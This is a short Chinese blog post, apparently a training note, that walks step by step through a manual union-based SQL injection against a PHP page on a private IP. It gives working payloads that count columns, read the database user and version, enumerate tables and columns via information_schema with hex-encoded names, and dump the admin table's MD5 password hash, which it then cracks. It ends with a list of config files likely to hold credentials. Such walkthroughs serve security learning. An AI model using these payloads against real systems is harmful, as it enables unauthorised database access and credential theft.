博客园 首页 私信博主 显示目录 隐藏目录 管理 动画

sql 注入手工实现二

这一节没有什么用,就是用来熟悉命令的
目标:http://10.6.1.54/newcontent.php?aid=79


1.order by 18-- 订购18-- //网站存在18个表

 

 2.联合查询,判断可回显数据位置,结果,可回显位置为2,9,14

 

 3.user()查看当前用户,version()查看版本,database()查看库名

 

 

当前用户为root用户具有最高权限

当前数据库为2011_xingguang
4.查看管理表and 1=2 union select 1,table_name,
3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,
from information_schema.tables where table_schema=0x323031315F78696E676775616E67
table_schema=库名的16进制

 

 这里我们看到当前表名为ym_admin

 

 在末尾添加 limit 1,1/2,1继续查看,如图

 

5.查看admin表列名

and 1=2 union select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name = 0x796D5F61646D696E-- 

 

 仍然是后面添加limit 逐个查看,的到0--7列名为aid,userid uname pwd usertype email addtime addip

4.爆破管理员账户密码

and 1=2 union select 1,pwd,3,4,5,6,7,8,userid,10,11,12,13,14,15,16,17,18 from ym_admin--

 

 从ym_admin中选择1,pwd,3,4,5,6,7,8,userid,10,11,12,13,14,15,16,17,18--爆管理员账户密码


b7a782741f667201b54880c925faec4b可以看出来是32位,采用md5加密,我们解密,密码10000


常见管理表命名方式:关键字

系统登录用户admin

 

 



config.asp里

db.asp

con.asp

config.php文件

 

posted @ 2019-09-16 17:09  【Abel】  阅读(142)  评论(0编辑  收藏  举报